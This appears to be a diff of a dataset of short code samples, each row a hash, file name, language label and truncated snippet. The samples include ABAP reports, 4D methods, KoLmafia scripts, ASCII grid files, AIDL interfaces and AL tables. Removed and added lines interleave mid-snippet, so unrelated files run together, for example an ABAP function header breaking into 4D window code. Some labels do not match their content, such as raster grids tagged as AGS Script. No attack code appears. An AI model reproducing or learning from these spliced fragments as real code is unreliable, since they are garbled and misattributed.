REFERENCE(HEIGHT) OPTIONAL -*"" REFERENCE(PARAMS) TYPE YDK_LIST=>TY_PARAM_TAB OPTIONAL -*"" EXCEPTIONS -*"" CANCEL -*""---------------------------------------------------------------------- - - DATA: rcol TYPE i. - DATA: brow TYPE i. - - DATA: linstance TYPE REF TO object. - DATA: lmethod TYPE string. - FIELD-SYMBOLS TYPE ydk_list=>ty_param_tab. - - DATA: lcall_mode TYPE c. - DATA: subrc LIKE sy-subrc. - - CLEAR exit_dlg. - - linstance = rinstance. - lmethod = rmethod. - IF IS ASSIGNED. - ASSIGN TO . - UNASSIGN . - ENDIF. - lcall_mode = gcall_mode. - - rinstance = instance. - rmethod = method. - IF params IS","215","1.0804020100502512","0.0","0.0" -"1354e7e489ec0457c1d5084ccaae9cf21dd62aab","ZTPPVM_BK_W.abap",".abap","ABAP","*&-------------------------------------------------------------* -*& Report ZTPPVM_BK_W -*&-------------------------------------------------------------* -*System name : HMI SYSTEM -*Sub system name : ARCHIVE -*Program name : Archiving : ZTPPVM_BK (Write) -*Program descrition : Generated automatically by the ZHACR00800 -*Created on : 20130521 Created by : T00302 -*Changed on : Changed by : -*Changed descrition : -*""-------------------------------------------------------------* -REPORT ZTPPVM_BK_W . - -***** Include TOP -INCLUDE ZTPPVM_BK_T . - -***** Selection screen. -SELECTION-SCREEN BEGIN OF BLOCK B2 WITH FRAME TITLE TEXT-001. -*SELECT-OPTIONS S_K04PDA FOR ZTPPVM_BK-K04PDAT. -*SELECT-OPTIONS S_K04PLN FOR ZTPPVM_BK-K04PLN. -*SELECT-OPTIONS S_K04SER FOR ZTPPVM_BK-K04SER. -SELECT-OPTIONS S_ZEDAT FOR ZTPPVM_BK-ZEDAT. -SELECTION-SCREEN SKIP 1. -PARAMETERS: TESTRUN AS CHECKBOX, - CREATE DEFAULT 'X' AS CHECKBOX, - ","215","1.0804020100502512","0.0","0.0" -"06c874237bc96bf0c30f7378235f763217db5e58","mdemo_transactiontop.prog.abap",".abap","ABAP","*----------------------------------------------------------------------* -* INCLUDE MTZ10TOP * -*----------------------------------------------------------------------* -PROGRAM sapmdemo_transaction. -TABLES spfli. - -DATA ok_code(4) TYPE c. - -DATA spfli_wa TYPE SPFLI. -","215","1.0804020100502512","0.0","0.0" -"069e4b4a3ba2d9a2760f3d6f26c52aabccdb873d","zimgpath.enho.ade2e79d.abap",".abap","ABAP","""Name: \PR:SAPLSHI01\FO:HANDLE_MENU_SELECT\SE:BEGIN\EI -ENHANCEMENT 0 ZIMGPATH. - CASE g_fcode. - WHEN 'ZZSHOWPATH'. - - DATA: BEGIN OF zz, - lv_nodekey TYPE tv_nodekey , - le_item TYPE shi_item, - le_node TYPE treev_node, - lv_relatkey TYPE tv_nodekey, - lv_relatship_ant TYPE int4, - html TYPE string, - END OF zz. - - CHECK g_tree_data->tree IS NOT INITIAL. - - READ TABLE g_tree_data->nodes INTO zz-le_node WITH KEY node_key = g_tree_data->node_key . - CHECK sy-subrc = 0. - - READ TABLE g_tree_data->items INTO zz-le_item - WITH KEY - node_key = g_tree_data->node_key - item_name = 'TEXT'. - CHECK sy-subrc = 0. - - zz-html = |{ escape( val = zz-le_item-text format = cl_abap_format=>e_html_text ) }|. - - zz-lv_relatkey = zz-le_node-relatkey. - zz-lv_relatship_ant = zz-le_node-relatship. - - WHILE zz-lv_relatkey IS NOT INITIAL. - - ","215","1.0804020100502512","0.0","0.0" -"04b064b37621b363d0a3cf8fb2d96a8eb0f89f3e","zatr_user.fugr.zatr_territory_budget.abap",".abap","ABAP","FUNCTION ZATR_TERRITORY_BUDGET . -*""---------------------------------------------------------------------- -*""*""Local Interface: + If (Shift down:C543) // for debug purpose only + $win:=Open form window:C675(""HDI"";Plain form window:K39:10;Horizontally centered:K39:1;Vertically centered:K39:4) + Else + $win:=Open form window:C675(""HDI"";Pop up form window:K39:11;Horizontally centered:K39:1;Vertically centered:K39:4) + End if + + $options:=New object:C1471 + + $options.title:=""insert or delete rows and columns\ror know what is selected in a table?"" + + $options.blog:=""blog.4d.com"" + $options.info:=""Managing rows and columns in tables"" //ex : ""4D View Pro feature"" + + $options.minimumVersion:=""1800"" // 18R2 means 18R2 1801 means 18.1 (do not use !) + + //$options.license:=4D View license // IF ANY NEEDED + $options.license:=4D Write license:K44:2 // IF ANY NEEDED + ","85","1.0897435897435896","0.0","0.0" +"082b3aa586aa8b5a9993b138c5fe2b001d2e12bf","method.4dm",".4dm","4D","Case of + : (Form event:C388=On Load:K2:1) + XS_SetConfigInterface + ACTinit_LoadPrefs + INSERT IN ARRAY:C227(atACT_TiposDato;1;4) + atACT_TiposDato{1}:=""N"" + atACT_TiposDato{2}:=""AN"" + atACT_TiposDato{3}:=""F"" + atACT_TiposDato{4}:=""H"" + xALP_ACT_RecepRecaud + vt_CharFiller:="""" + vl_LargoReg:=0 + vl_TiposReg:=0 + vl_PreviosReg:=0 + vl_PosterioresReg:=0 + vtACT_BancoNombre:="""" + vtACT_BancoCodigo:="""" + vNombreModelo:="""" + NewFiller:=False:C215 + modificado:=False:C215 + vLastRow:=0 + vLastCol:=0 + alACT_Campo{0}:=0 + atACT_Descripcion{0}:="""" + alACT_Largo{0}:=0 + atACT_TipoDato{0}:="""" + atACT_Posicion{0}:="""" + atACT_Correspondencia{0}:="""" + alACT_PosIni{0}:=0 + alACT_PosFinal{0}:=0 + IT_SetButtonState (False:C215;->bInsertLine;->bDeleteLine;->bTestImport;->bSaveDef;->bLoadDef;->bModelos;->bDeleteModelo;->bSave) + IT_SetEnterable (False:C215;0;->vl_TiposReg;->vl_LargoReg;->vt_CharFiller;->vl_PreviosReg;->vl_PosterioresReg;->vNombreModelo) + : (Form event:C388=On Close Box:K2:21) + vbCF","85","1.0897435897435896","0.0","0.0" +"086fa70d61513159290a314029b7786a00932208","testP1.4dm",".4dm","4D","//%attributes = {} + // MI 13-Apr-2019 22:25:39 (GMT+1) + +C_OBJECT:C1216($1;$banner) +$banner:=$1 + + + // step 1 +$banner.Message(""Please wait "") +$banner.duration:=3 // in seconds +HeartBeat ($banner) + + // step 2 +$banner.Message(""I'm currently working hard"") +$banner.duration:=8 // in seconds +HeartBeat ($banner) + + // Step 3 +$banner.Message(""finishing processing data"") +$banner.duration:=5 // in seconds +HeartBeat ($banner) + + // end process +BEEP:C151 +CALL FORM:C1391($banner.refWindow;""UpdateBanner"";""Now it's done"") +DELAY PROCESS:C323(Current process:C322;60) // Delay 1 sec +CALL FORM:C1391($banner.refWindow;""CloseBanner"") +BEEP:C151 +OBJECT SET VISIBLE:C603(*;""AJUI_Banner"";False:C215) +","85","1.0897435897435896","0.0","0.0" +"014796d88456eed833e8b692c9881f6e20099597","zif_abapgit_gui_event_handler.intf.abap",".abap","ABAP","INTERFACE zif_abapgit_gui_event_handler + PUBLIC . + + TYPES: + BEGIN OF ty_handling_result, + page TYPE REF TO zif_abapgit_gui_renderable, + state TYPE i, + END OF ty_handling_result. + + METHODS on_event + IMPORTING + ii_event TYPE REF TO zif_abapgit_gui_event + RETURNING + VALUE(rs_handled) TYPE ty_handling_result + RAISING + zcx_abapgit_exception. + +ENDINTERFACE. +","216","1.0236966824644549","0.0","0.0" +"0c055cb3aad88b2e94146eab01018b84d63ac46e","ydk_alv.fugr.conversion_exit_ydk01_input.abap",".abap","ABAP","FUNCTION conversion_exit_ydk01_input . +*""-------------------------------------------------------------------- +*""*""Локальный интерфейс: *"" IMPORTING -*"" VALUE(IMUSER_TYPE) TYPE ZATR_USER_M-USER_TYPE OPTIONAL -*"" VALUE(IMUSER_ID) TYPE ZATR_USER_M-USER_ID OPTIONAL -*"" VALUE(IMGJAHR) TYPE ZSD_BDG_T-GJAHR OPTIONAL -*"" VALUE(IMSPART) TYPE ZSD_BDG_T-SPART OPTIONAL +*"" REFERENCE(INPUT) *"" EXPORTING -*"" VALUE(STS) TYPE STRING -*"" TABLES -*"" TAB_TERRITORY_BDG_DET STRUCTURE ZATR_STRUC_BUDGET OPTIONAL -*""---------------------------------------------------------------------- - - TYPES : BEGIN OF TY_MARA, - MATNR TYPE MARA-MATNR, - MATKL TYPE MARA-MATKL, - EXTWG TYPE MARA-EXTWG, - END OF TY_MARA. - - DATA : GT_USER TYPE TABLE OF ZATR_USER_TMAP, - GT_ZSD_BDG_T TYPE TABLE OF ZSD_BDG_T, - GT_TAB TYPE TABLE OF ZATR_STRUC_BUDGET, - GT_MARA TYPE TABLE OF TY_MARA, - - GS_USER LIKE LINE OF GT_USER, - GS_ZSD_BDG_T LIKE LINE OF ","215","1.0804020100502512","0.0","0.0" -"0dd51703f407bcebff0244a11ca8cfbdf757e0d1","grid31.0-44.0-32.0-45.0.asc",".asc","AGS Script","ncols 200 -nrows 200 -xllcorner 31.0 -yllcorner 44.0 -cellsize 0.005 -NODATA_value -9999.0 - -301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 203 203 203 203 203 203 203 203 203 203 203 203 203 203 221 221 221 221 221 221 221 221 221 221 221 221 221 221 221 221 221 222 223 223 223 224 224 225 225 226 226 226 227 227 228 228 228 229 229 229 230 230 230 230 231 231 231 232 232 232 232 229 229 229 229 230 230 230 230 231 231 231 231 231 232 232 232 232 232 233 233 233 233 233 233 234 234 234 234 234 234 234 235 235 235 235 235 235 235 235 236 236 236 236 236 236 236 236 236 237 237 248 248 248 248 248 248 248 248 248 249 249 249 249 249 250 250 250 251 251 251 252 252 252 253 253 253 254 254 254 254 256 256 256 257 257 257 257 257 258 258 258 258 259 259 259 259 259 260 260 260 260 260 261 -301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 301 3","605","0.9166666666666666","0.0","0.0" -"00d41980f3d34d6f3d969d831a5d83be0759aab9","B1952+29_hkk98_4850.epn.asc",".asc","AGS Script","Stokes I Q U V - Time (s) Data... - 0.0008332 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.0016664 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.00249959994 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.0033328 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.00416600006 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.00499919988 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.00583240017 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.0066656 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.00749880029 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.00833200011 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.0091652004 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.00999839976 -2.25355634E-05 -5.34016272E-06 -2.89423883E-06 -5.7967336E-06 - 0.0108316001 -2.2535","605","0.9166666666666666","0.0","0.0" -"20d617526dd98294d21f6b2f40271f8b26fed3d9","psiliqL0021N0001.asc",".asc","AGS Script","ncols 104 +*"" REFERENCE(OUTPUT) +*""-------------------------------------------------------------------- +* see FM YDK_CONVERSION_EXIT_REGISTER + PERFORM input USING '01' input CHANGING output. +ENDFUNCTION. +","216","1.0236966824644549","0.0","0.0" +"060602cbe8c4745de172d77193755dc3865093f8","ZRPP208R_TRIM_INPUT_PLAN.abap",".abap","ABAP","************************************************************************ +* Program Name : ZRPP208R_TRIM_INPUT_PLAN +* Author : KIM GIL-HYUN (Tonkey) +* Creation Date : 2003.05.10. +* Specifications By : B. Choi +* Pattern : 2.1 +* Development Request No : UD1K910227 +* Addl Documentation: YRPP208R_TRIM_INPUT_PLAN_OLD . +* Description : Trim Input Plan +* +* Modification Logs +* Date Developer RequestNo Description +*#1 03/22/2005 wskim UD1K914858 add weekly data +* 08/03/2005 chris UD1K917193 sort table it_7jb_date internal +* table +************************************************************************ +REPORT zrpp208r_trim_input_plan MESSAGE-ID zmpp . + +TABLES: ztpp_common_vals, ""[PP] COMMON Information Table + ztpp_alc_tinput. ""[PP] Trim Input Plan Table + +INCLUDE . +INCLUDE . +*****// ALV //********************************************************** +TYPE-POOLS: slis. +DATA: gt_f","216","1.0236966824644549","0.0","0.0" +"0fd054b5000ef7a31bd74452a92ef38505e69d5f","zaoc_line_length.prog.abap",".abap","ABAP","REPORT zaoc_line_length. + +* abapOpenChecks +* https://github.com/larshp/abapOpenChecks +* MIT License + +TABLES: tdevc. + +SELECTION-SCREEN BEGIN OF BLOCK b1 WITH FRAME TITLE TEXT-001. +SELECT-OPTIONS: s_devc FOR tdevc-devclass OBLIGATORY. +SELECTION-SCREEN END OF BLOCK b1. + +SELECTION-SCREEN BEGIN OF BLOCK b2 WITH FRAME TITLE TEXT-002. +PARAMETERS: p_split TYPE i DEFAULT 10. +SELECTION-SCREEN END OF BLOCK b2. + +****************************************************************** + +TYPES: BEGIN OF ty_result, + from TYPE string, + count TYPE i, + END OF ty_result. + +TYPES: ty_result_tt TYPE STANDARD TABLE OF ty_result WITH DEFAULT KEY. + +CLASS lcl_app DEFINITION FINAL. + + PUBLIC SECTION. + CLASS-METHODS: + run RETURNING VALUE(rt_result) TYPE ty_result_tt. + + PRIVATE SECTION. + CLASS-DATA: + mt_result TYPE ty_result_tt. + + CLASS-METHODS: + init_result, + run_package IMPORTING iv_devclass TYPE devclass, + run_program IMPORTING iv_program TYPE program. + +ENDCLAS","216","1.0236966824644549","0.0","0.0" +"0ab2cfee6b77a6c042d1ef28ae312108c79d6bdd","sapbc414t_bookings_01.prog.abap",".abap","ABAP","*&---------------------------------------------------------------------* +*& Modulpool SAPBC414T_BOOKINGS_01 * +*&---------------------------------------------------------------------* + +INCLUDE BC414T_BOOKINGS_01TOP. +INCLUDE BC414T_BOOKINGS_01O01. +INCLUDE BC414T_BOOKINGS_01I01. +INCLUDE BC414T_BOOKINGS_01F01. +INCLUDE BC414T_BOOKINGS_01F02. +INCLUDE BC414T_BOOKINGS_01F03. +INCLUDE BC414T_BOOKINGS_01F04. +INCLUDE BC414T_BOOKINGS_01F05. +INCLUDE BC414T_BOOKINGS_01F06. +","216","1.0236966824644549","0.0","0.0" +"0d5a07cad767c1b9c1f7421db020ed22d848af52","TL0003N0409.asc",".asc","AGS Script","ncols 63 +nrows 48 +xllcorner 598000.000000 +yllcorner 5145000.000000 +cellsize 1000.000000 +NODATA_value -9999.0 +-9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 +-9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 17.080007 14.260359 11.882901 9.297599 -0.551029 -1.165422 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9","633","0.975346687211094","0.0","0.0" +"0f6bbb0c6b2d76d432c33f11c69894fca428dfce","wttopN0108.asc",".asc","AGS Script","ncols 104 nrows 10 xllcorner -2.000000 yllcorner 0.000000 cellsize 1.000000 NODATA_value -9999.0 --9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -9999.000 -99","605","0.9166666666666666","0.0","0.0" -"0e44ef5c8b2c5af241150f4e53b16da0471f9a4c","NB14.asc",".asc","AGS Script","ncols 200 -nrows 200 -xllcorner 110000 -yllcorner 940000 -cellsize 50 --1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6 -1.6","605","0.9166666666666666","0.0","0.0" -"04db358a204b3429377ad5b6074c0425306b3f4a","2016010218_Pres.asc",".asc","AGS Script","ncols 4 -nrows 5 -xllcorner -1210458.76443 -yllcorner 4504093.75781 -cellsize 50996.6881218 -25.2268 24.9433 24.2014 23.3638 -25.1012 24.8436 24.106 23.3425 -24.9898 24.6376 23.6701 23.3625 -24.4035 24.1285 23.674 23.2129 -24.2756 23.7698 23.5373 23.5121 -","605","0.9166666666666666","0.0","0.0" -"1c9a9a13a3af2ea89b412cc28180e87c77b51a22","n2e_d.ash",".ash","AGS Script","; n2e_d.ash -- NRV2E decompression in 68000 assembly -; -; This file is part of the UCL data compression library. -; -; Copyright (C) 1996-2002 Markus Franz Xaver Johannes Oberhumer -; All Rights Reserved. -; -; The UCL library is free software; you can redistribute it and/or -; modify it under the terms of the GNU General Public License as -; published by the Free Software Foundation; either version 2 of -; the License, or (at your option) any later version. -; -; The UCL library is distributed in the hope that it will be useful, -; but WITHOUT ANY WARRANTY; without even the implied warranty of -; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -; GNU General Public License for more details. -; -; You should have received a copy of the GNU General Public License -; along with the UCL library; see the file COPYING. -; If not, write to the Free Software Foundation, Inc., -; 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. -; -; Markus F.X.J. Oberhumer -; -; http:/","19","0.02878787878787879","0.0","0.0" -"0078358bde48f54099248c9607cf30e7397157dc","yz_L09_Q_topping.ash",".ash","AGS Script","import ""quests/council/yz_L09_SQ_bridge.ash""; -import ""quests/council/yz_L09_SQ_oilpeak.ash""; -import ""quests/council/yz_L09_SQ_aboo.ash""; -import ""quests/council/yz_L09_SQ_twin.ash""; +; 0) - progress(310.66 - oil, 310.66, wrap($location[oil peak]) + "" pressure""); + string page = visit_url(""place.php?whichplace=town_wrong&action=townwrong_boxingdaycare"", false); + page = visit_url(""choice.php?pwd=&whichchoice=1334&option=2""); + page = visit_url(""choice.php?pwd=&whichchoice=1335&option=3""); //I always use myst, due to item drop. - int boo = to_int(get_property(""booPeakProgress"")); - if (boo > 0) -","19","0.02878787878787879","0.0","0.0" -"0b0b7200308efc375d789e293c7075835023db2c","test_string_template.ash",".ash","AGS Script","string what_do_I_now_know() + if(!get_property(""_daycareSpa"").to_boolean()) + { + abort(""Messed up boxing day c","23","0.03543913713405239","0.0","0.0" +"1846ce204661e9d2e959b7a9deffa240b801e0ad","Location Bar.ash",".ash","AGS Script","import ""relay/Guide/Sections/Location Bar Popup.ash""; + +buffer generateLocationBar(boolean displaying_navbar) +{ + buffer bar; + if (!playerIsLoggedIn()) + return bar; + location l = __last_adventure_location; + if (!__setting_location_bar_uses_last_location && !get_property_boolean(""_relay_guide_setting_ignore_next_adventure_for_location_bar"") && get_property_location(""nextAdventure"") != $location[none]) //setting exists for ascension scripts that alter my_location() to a null value/noob cave whenever they're not adventuring somewhere specific, to avoid environment-based effects on modifiers. + l = get_property_location(""nextAdventure""); + //l = my_location(); + + if (l == $location[none] || __misc_state[""In valhalla""]) + return """".to_buffer(); + + + string url = l.getClickableURLForLocation(); + + + float [monster] monster_appearance_rates = l.appearance_rates_adjusted(); + + + int nc_rate = MAX(0.0, monster_appearance_rates[$mon","23","0.03543913713405239","0.0","0.0" +"070ebc72891ba15e9e534bc34776432d602a839b","Batfellow State.ash",".ash","AGS Script"," + +/*zone values: +Bat-Cavern +Somewhere in Gotpork City +Center Park (Low Crime) +Slums (Moderate Crime) +Industrial District (High Crime) +Downtown +*/ +//Bat-Investigation Progress appears to be the amount of progress you advance per fight, which upgrades with upgrades. +Record BatState { - return ""my ABC""; -} - -String when = ""Now""; -string who = 'I'; - -print( - - `{//Comment - when - - } { - who - } {false?""knew"":true?""know"":""knee""}\ - - - ` - - + + string zone; + int funds_available; + int time_left; + + string [string] stats; + boolean [string] upgrades; + /*int hp; + int max_hp; + int hp_regen;*/ + //FIXME more +}; - ` { what_do_I_now_know() + ""!"" }` +BatState __batstate; -); -","19","0.02878787878787879","0.0","0.0" -"005053f117c3b95564cdf413d2bac3bc64135bab","IMPORT.ASH",".ash","AGS Script","xcall macro x - extrn x:near - call x - endm -","19","0.02878787878787879","0.0","0.0" -"0072120931416dfae39e3cbb3e609f1a24a1186e","ICompute.aidl",".aidl","AIDL","// ICompute.aidl -package com.haihua.testthree; +BatState BatStateMake() +{ + BatState state; + //Parse: + state.zone = get_property(""batmanZone""); + state.funds_available = get_property_int(""batmanFundsAvailable""); + state.time_left = get_property_int(""batmanTimeLeft""); + //FIXME upgrades + + foreach key, s in get_property(""batmanStats"").split_string_alternate("";"") + { + string [int] attribution = s.split_string_alternate(""=""); + if (attribution.count() != 2) + continue; + state.stats[attribution[","23","0.03543913713405239","0.0","0.0" +"03cb63d3205b88232b7ee89604f8d67398c13f89","IfStatements.ash",".ash","AGS Script","public class IfStatements { + public static func main(args : [String]) { + const name = ""Sam"" + if name.equals(""Sam"") { + print(""Yay :D"") + } else if name.equals(""Tebbs"") { + print(""Damn it :/"") + }else print(""Hmmm..."") + + } + public static func print(msg : String) = System.out.println(msg) +}","23","0.03543913713405239","0.0","0.0" +"01de23fae484d62e5aa2707017deaed69639bca9","IMyAidlInterface.aidl",".aidl","AIDL","// IMyAidlInterface.aidl +package com.happy.jinbailiang.lianghappylife.view; // Declare any non-default types here with import statements -interface ICompute { - int add(int a, int b); - int sub(int a, int b); -} -","158","0.8926553672316384","0.0","0.0" -"1e5c4d2ad36d9750a84aefcabdef9d2eb45ad0c5","IBluetoothA2dp.aidl",".aidl","AIDL","// IBluetoothA2dp.aidl -package android.bluetooth; +interface IMyAidlInterface { + /** + * Demonstrates some basic types that you can use as parameters + * and return values in AIDL. + */ + String basicTypes(int anInt, long aLong, boolean aBoolean, float aFloat, + double aDouble, String aString); -// Declare any non-default types here with import statements + String aidl_change(String aString); +} +","177","0.9672131147540983","0.0","0.0" +"12cee6eb2492f516f407ef0188e31d698c5f209f","IMyService.aidl",".aidl","AIDL","package net.tky.servicees; -interface IBluetoothA2dp { - boolean connectSink(in BluetoothDevice device); // Pre API 11 only - boolean disconnectSink(in BluetoothDevice device); // Pre API 11 only - boolean connect(in BluetoothDevice device); // API 11 and up only - boolean disconnect(in BluetoothDevice device); // API 11 and up only - boolean suspendSink(in BluetoothDevice device); // all - boolean resumeSink(in BluetoothDevice device); // all - BluetoothDevice[] getConnectedSinks(); // change to Set<> once AIDL supports, pre API 11 only - BluetoothDevice[] getNonDisconnectedSinks(); // change to Set<> once AIDL supports, - int getSinkState(in BluetoothDevice device); // pre API 11 only - int getConnectionState(in BluetoothDevice device); // API 11 and up - boolean setSinkPriority(in BluetoothDevice device, int priority); // Pre API 11 only - boolean setPriority(in BluetoothDe","158","0.8926553672316384","0.0","0.0" -"0eb3be1ccc60e3bc2964f48758011f4f487b92a1","INStreamService.aidl",".aidl","AIDL","package net.khhq.android.audio; - -interface INStreamService -{ - void start(String url); - String errors(); - void pause(); - void stop(); - int state(); -}","158","0.8926553672316384","0.0","0.0" -"0750a79e9168eb68b8665a7ec28a6516a0208023","IPackageManager.aidl",".aidl","AIDL","/* -** -** Copyright 2007, The Android Open Source Project -** -** Licensed under the Apache License, Version 2.0 (the ""License""); -** you may not use this file except in compliance with the License. -** You may obtain a copy of the License at -** -** http://www.apache.org/licenses/LICENSE-2.0 -** -** Unless required by applicable law or agreed to in writing, software -** distributed under the License is distributed on an ""AS IS"" BASIS, -** WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -** See the License for the specific language governing permissions and -** limitations under the License. -*/ +interface IMyService{ + void setMessage(String msg); +} -package android.content.pm; +","177","0.9672131147540983","0.0","0.0" +"013552dc1089ce4ae772b68139eb9effc16c4123","Book.aidl",".aidl","AIDL","package com.bruce.android.knowledge.test.aidl; -import android.content.ComponentName; -import android.content.Intent; -import android.content.IntentFilter; -import android.content.pm.ActivityInfo; -import android.content.pm.ApplicationInfo; -import android.content.pm.ContainerEncryptionParams; -import android.content.pm.FeatureInfo; -import android.content.pm.IPackageInstallObserver; -import android.conte","158","0.8926553672316384","0.0","0.0" -"140ec3a67d33a89301a3485261f8ce371b186391","ITranslateCallback.aidl",".aidl","AIDL","// ITranslateCallback.aidl -package com.insightsurfface.myword.aidl; +parcelable Book;","177","0.9672131147540983","0.0","0.0" +"11379d949006b8cea00413859bae49e08f0072ee","CommonService.aidl",".aidl","AIDL","package com.beyondbit.smartbox.aidl; +import com.beyondbit.smartbox.aidl.CommonResponseXml; +import com.beyondbit.smartbox.aidl.SCPSimpleItem; +import com.beyondbit.smartbox.aidl.ChannelService; +import com.beyondbit.smartbox.aidl.SCPSimpleReceiveCallback; + +interface CommonService { + CommonResponseXml sendReqXml(String reqXml, int timeout); + + int applyReqId(); + + void asyncSendReqXml(int reqId, String reqXml); + + CommonResponseXml getRespXml(); + + SCPSimpleItem senSCPItem(in SCPSimpleItem scpItem); + + void asyncSenSCPItem(in SCPSimpleItem scpSimpleItem, SCPSimpleReceiveCallback callback, int arg,String tag); + ChannelService createChannelServiceImpl(String host, int port); + +} +","177","0.9672131147540983","0.0","0.0" +"0c07ffd91b1ff3b154609432c2a608b3efc6db43","BusMessage.aidl",".aidl","AIDL","// IBusMessage.aidl +package com.osovskiy.bmwired.lib; // Declare any non-default types here with import statements -import com.insightsurfface.myword.aidl.TranslateWraper; -interface ITranslateCallback { - void onResponse(in TranslateWraper translate); - void onFailure(String message); -} -","158","0.8926553672316384","0.0","0.0" -"0e9b2e38650a56e28d4c81f65920b5683dc1a7cd","ALIssue.Table.al",".al","AL","table 50115 ""WLD ALIssue"" +parcelable BusMessage;","177","0.9672131147540983","0.0","0.0" +"0877e4433aa38ee40a958399b2feb0ae5b2bd413","TableExtension 50100 - AutoTask Customer.al",".al","AL","tableextension 50100 ""Autotask Customer"" extends Customer //MyTargetTableId +{ + fields + { + field(50100; ""Autotask ID""; Integer) { } + } + +}","221","1.0574162679425838","0.0","0.0" +"10ed01b7a766e677f8ec38a3a2baa9a6bcad29ef","Report_5_691_Index_Insurance.al",".al","AL","OBJECT Report 5691 Index Insurance { - - fields - { - field(1; id; Integer) - { - dataclassification = CustomerContent; - Caption = 'ID'; - } - field(2; number; Integer) - { - dataclassification = CustomerContent; - Caption = 'Number'; - } - field(3; title; Text[250]) - { - dataclassification = CustomerContent; - Caption = 'Title'; - } - field(5; ""created_at""; DateTime) - { - dataclassification = CustomerContent; - Caption = 'Created at'; - } - field(6; user; text[50]) - { - dataclassification = CustomerContent; - Caption = 'User'; - } 